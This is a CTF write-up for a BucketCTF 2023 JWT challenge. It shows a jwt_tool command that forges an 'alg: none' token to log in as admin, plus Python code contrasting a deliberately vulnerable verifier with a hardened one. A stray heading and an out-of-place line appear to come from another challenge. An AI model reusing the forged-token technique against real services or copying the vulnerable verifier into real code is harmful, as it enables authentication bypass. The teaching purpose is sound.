BucketCTF 2023 - Auth
BucketCTF 2023 - This article is part of a series.
Clock 2 #
Description #
I just started learning about a new authentication method called JWT. This is my first website with it, could you check if it's secure?
TL;DR #
As the description indicates, we will certainly have to exploit a JWT vulnerability. The website has a /register page that lets us register and thus obtain JWT tokens for our account.
However, no route accessible by default lets us submit a JWT token to the server.
So we first have to find a route, or some other way, to send a JWT token to the server before we can try to bypass the authentication.
Solution #
First I ran a gobuster scan on the website to see if there is a page where we can provide a JWT token.
The /info route leads to a /validate route that needs a token as a GET parameter.
We will now try to exploit the JWT token with dillonfrank's fork of jwt_tool, which adds support for GET parameters:
Then I replaced [0-4] with 0 and [5-9] with 1.
~$ python3 jwt_tool.py -M at -t "http://213.133.103.186:6307/validate?" -gd "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QyIiwiaWF0IjoxNjgwOTk2ODgyfQ.2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840" -I -pc username -pv admin
[...]
jwttool_e0e5c45b9f118f38e4bccbf97821f92e Exploit: "alg":"none" (-X a) Response Code: 200, 37 bytes
[...]
~$ python3 jwt_tool.py -Q "jwttool_e0e5c45b9f118f38e4bccbf97821f92e"
We can see that the server returns a 200 for the token using the "none" algorithm, so we can query that result and get the flag.
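The bug jwt_tool found is the server trusting the `alg` field inside the token. The following is an added example, not the challenge's code: it builds tokens like the one above, then compares a verifier that honours `alg: none` with one that pins HS256 server-side (the secret and claims are constructed for the demo).

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; the real challenge key is unknown.
SECRET = b"constructed-demo-secret"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(claims: dict, alg: str, key: bytes = SECRET) -> str:
    """Build a JWT. With alg="none" the signature part is left empty,
    which is the token shape jwt_tool's -X a check submits."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims).encode())
    if alg == "none":
        return f"{header}.{body}."
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_vulnerable(token: str, key: bytes = SECRET) -> Optional[dict]:
    """Trusts alg from the header: a client-chosen "none" skips the check."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header["alg"] == "none":
        return json.loads(_b64url_decode(body_b64))
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return json.loads(_b64url_decode(body_b64))
    return None


def verify_hardened(token: str, key: bytes = SECRET) -> Optional[dict]:
    """Pins HS256 server-side and always checks the MAC, so "none" is rejected."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(body_b64))
```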
Flag #
bucket{1_l0v3_jwt!!!1!!!!1!!!!!1111!}